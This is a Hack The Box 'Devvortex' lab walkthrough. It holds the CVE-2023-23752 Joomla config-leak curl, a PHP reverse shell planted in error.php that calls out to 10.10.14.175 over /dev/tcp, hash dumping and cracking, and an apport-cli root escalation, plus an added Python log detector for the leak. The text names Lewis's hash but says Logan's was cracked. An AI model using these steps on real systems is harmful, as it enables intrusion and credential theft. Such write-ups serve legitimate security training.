# HTB - Devvortex

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2F4prW2eCNAsyYcCuN6DrE%2Fdevvortex.jpg?alt=media&#x26;token=249d7668-7435-469b-9f71-ec63cdac0ebf" alt=""><figcaption></figcaption></figure>

## Enumeration Phase:

### Nmap scan

First off, I started my enumeration with an Nmap scan of **`10.10.11.242`**. The options I regularly use are **`-sC`**, which is equivalent to **`--script=default`** and runs the default set of Nmap enumeration scripts against the target, and **`-sV`**, which does service/version detection.

```
nmap -sC -sV 10.10.11.242
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2Fvtt7Y1EJzbvYlkcRaoNG%2Fnmap.png?alt=media&#x26;token=e679e11d-71c8-41bb-92ae-2ee55073cdf5" alt=""><figcaption></figcaption></figure>

I added **`devvortex.htb`** to `/etc/hosts` next to the IP of the box which is **`10.10.11.242`**

Since I still didn't have a way in, the next place to enumerate was **HTTP** on port **80**, navigating to **`http://devvortex.htb`**.

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2Ff8fJ6ARmbEjDApHSIV9z%2Fdevvortex.png?alt=media&#x26;token=87f5d04e-629f-4a2f-af97-aec8edcc23bd" alt=""><figcaption></figcaption></figure>

### Brute-force hidden directories: <a href="#ee16" id="ee16"></a>

After visiting **`http://devvortex.htb`** I decided to brute-force hidden directories with Gobuster and didn't find anything :cry:

```
gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200
```

### Subdomain enumeration: <a href="#ee16" id="ee16"></a>

I also used Gobuster for subdomain (vhost) enumeration on this host and found **dev.devvortex.htb**.

```
gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FYWRhSff6o0N5cHJokfky%2Fvhost.png?alt=media&#x26;token=01dfb7a9-56e0-4574-ac6b-97c14a64d2f0" alt=""><figcaption></figcaption></figure>

I added **`dev.devvortex.htb`** to `/etc/hosts` next to the IP of the box which is **`10.10.11.242`**

After visiting **`http://dev.devvortex.htb`**:

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2F0ABOuyBgFeQgCf1iLMo3%2Fdevdev.png?alt=media&#x26;token=29473125-fb68-42d3-af45-fd99c94332f2" alt=""><figcaption></figcaption></figure>

### Brute-force hidden directories: <a href="#ee16" id="ee16"></a>

I decided to brute-force hidden directories with Dirsearch and found **/administrator/** and **/Readme.txt** :tada:

```
dirsearch -u dev.devvortex.htb
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FM2D9NRrDZLlgXBHvVpmo%2Fdir.png?alt=media&#x26;token=8aa24517-a8f8-4b59-804e-0df7e9078de4" alt=""><figcaption></figcaption></figure>

On the **Administrator** page, I found that it is the login page of Joomla CMS.

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FlrzP00YSSanMazCbOIWN%2Flogin.png?alt=media&#x26;token=ed343070-30b5-4161-afb0-ef8b829f64b9" alt=""><figcaption></figcaption></figure>

On the **Readme.txt** page, I found the version: **Joomla CMS 4.2**.

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FYxEsBG0gr11d6f73U2Vq%2Fversion.png?alt=media&#x26;token=7b08a42a-3cb4-438e-9eb8-aa30b9693223" alt=""><figcaption></figcaption></figure>

### Initial Foothold: <a href="#id-5880" id="id-5880"></a>

I found out that **Joomla CMS 4.2** is vulnerable to **CVE-2023-23752**, an unauthenticated information disclosure in the Joomla web services API, and used **Curl** to retrieve sensitive information including the **Username** and **Password** of user **Lewis**.\
More about **CVE-2023-23752** at this link: <https://nvd.nist.gov/vuln/detail/CVE-2023-23752>

```
curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2F6QwVAFz6AJ0ayB4NXwGc%2Fcurl.png?alt=media&#x26;token=f522ac25-9b35-4944-90ec-2b04cd6c33ff" alt=""><figcaption></figcaption></figure>
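As an added defender-side example (not part of the original writeup), the following Python flags requests for the Joomla config route shown in the curl above in combined-format access logs, and separates probes that were actually served (HTTP 200) from ones the server refused. The log lines are constructed samples, not output from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip - user [time] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Joomla 4 web-services route read by the curl above; the /api/v1/ form is the same
# route when URL rewriting is enabled.
CONFIG_ROUTE = re.compile(r"^/api(?:/index\.php)?/v1/config/application/?$")

def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    entry["query"] = parse_qs(url.query)
    entry["status"] = int(entry["status"])
    return entry

def is_cve_2023_23752_probe(entry):
    """True for a request to the config route carrying the public= parameter.
    An unauthenticated hit without public= gets a 401 from Joomla and is not a probe."""
    return bool(CONFIG_ROUTE.match(entry["path"])) and "public" in entry["query"]

def find_probes(lines):
    """Return (ip, time, status) per probe; status 200 means the config was actually served."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_cve_2023_23752_probe(entry):
            hits.append((entry["ip"], entry["time"], entry["status"]))
    return hits

def served_to(lines):
    """Distinct client IPs that got a 200, i.e. the leak succeeded against an unpatched site."""
    return sorted({ip for ip, _, status in find_probes(lines) if status == 200})

# Constructed sample log lines (not from the box); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Nov/2023:10:15:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1528 "-" "curl/8.4.0"
198.51.100.7 - - [20/Nov/2023:10:15:03 +0000] "GET /index.php HTTP/1.1" 200 9213 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Nov/2023:10:15:09 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 88 "-" "curl/8.4.0"
203.0.113.9 - - [20/Nov/2023:10:16:11 +0000] "GET /api/v1/config/application?public=true&page%5Boffset%5D=0 HTTP/1.1" 403 162 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG.splitlines()):
        print("probe from %s at %s -> HTTP %d" % hit)
    print("config served to:", served_to(SAMPLE_LOG.splitlines()))
```

On a patched Joomla the route answers 401/403 to these probes, so a 200 in the output is the signal that the configuration (database credentials included) left the server.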

After logging in to the **Administrator** page with the credentials I found with Curl, I edited **error.php**, located at **/templates/cassiopeia/error.php**, and set up a reverse shell script.

```
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2F81x4y5aWk9wRYCCpMX2S%2Ferror.png?alt=media&#x26;token=35f0b53e-9978-4692-a65f-4ffa01f71cb9" alt=""><figcaption></figcaption></figure>

I ran **Netcat** to listen for incoming connections and used **Curl** to trigger the **reverse shell** via the **error.php** page.

```
nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2F8IPMMYaBO62IWZaF4Gc6%2Freverseshell.png?alt=media&#x26;token=3166ab69-4e6f-4ed3-bb2f-6673e3f129cc" alt=""><figcaption></figcaption></figure>

**Boom!** I got the **shell** as **www-data**

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FqtXl4pUYbiICyJJNm7q6%2Fdata.png?alt=media&#x26;token=c6f31a17-e6d2-4824-b06d-e1bb961608f3" alt=""><figcaption></figcaption></figure>

### Owning User: <a href="#id-7154" id="id-7154"></a>

The **credentials** I found with **Curl** also included a **database name**, so I went on to check MySQL.

```
mysql -u lewis -p
show databases;
use joomla;
show tables;
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FQCuOp1B1VRiDM76p8C6T%2Fmysql.png?alt=media&#x26;token=1b6ec697-db9d-47d4-a21d-d565c44778d1" alt=""><figcaption></figcaption></figure>

```
select * from sd4fg_users;
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FvEElta2M1A6JGomUtiL4%2Fmysql%202.png?alt=media&#x26;token=2b36a274-2e56-4002-8aca-853546e3bba6" alt=""><figcaption></figcaption></figure>

Bingo :tada: I found the **hash** of **Lewis** and saved the hash locally in a .txt file.

```
echo 'HASH' >> hash.txt
```

I cracked the hash of **Logan** using the tool **John The Ripper**.

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2F1IG02EEhlSE1CwdcyF5I%2Fjohn.png?alt=media&#x26;token=e22158da-c916-48f4-be08-cfc32a5bfaa2" alt=""><figcaption></figcaption></figure>

Sweet!!!! I logged in as user **Logan** via **SSH**.

```
ssh logan@devvortex.htb
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FDmcrXvqJHdo7SdTR886y%2Fimage.png?alt=media&#x26;token=7c3e3a41-a3ca-4623-8eff-f677ab84b4e8" alt=""><figcaption></figcaption></figure>

### Owning Root: <a href="#a6ef" id="a6ef"></a>

The **sudo -l** command gave me some interesting output:

```
sudo -l
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FxBc56OhuBWcyXbgdaI3z%2Fimage.png?alt=media&#x26;token=eb81a67d-5bad-4ea6-9565-10f44655ff33" alt=""><figcaption></figcaption></figure>

I found out that **Apport-cli** is vulnerable to **CVE-2023-1326**.\
More about **CVE-2023-1326** at this link: [**https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023**](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023)

```
sudo apport-cli -c /bin/mysql less
v
!
id
```

<figure><img src="https://3428914540-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FY3ATNfStu0iYjwa3JAQp%2Fuploads%2FwdvT2IzhuXawpYwvtBiV%2Froot.png?alt=media&#x26;token=a76ba0aa-5df4-46b6-bddd-61fcae6642e9" alt=""><figcaption></figcaption></figure>
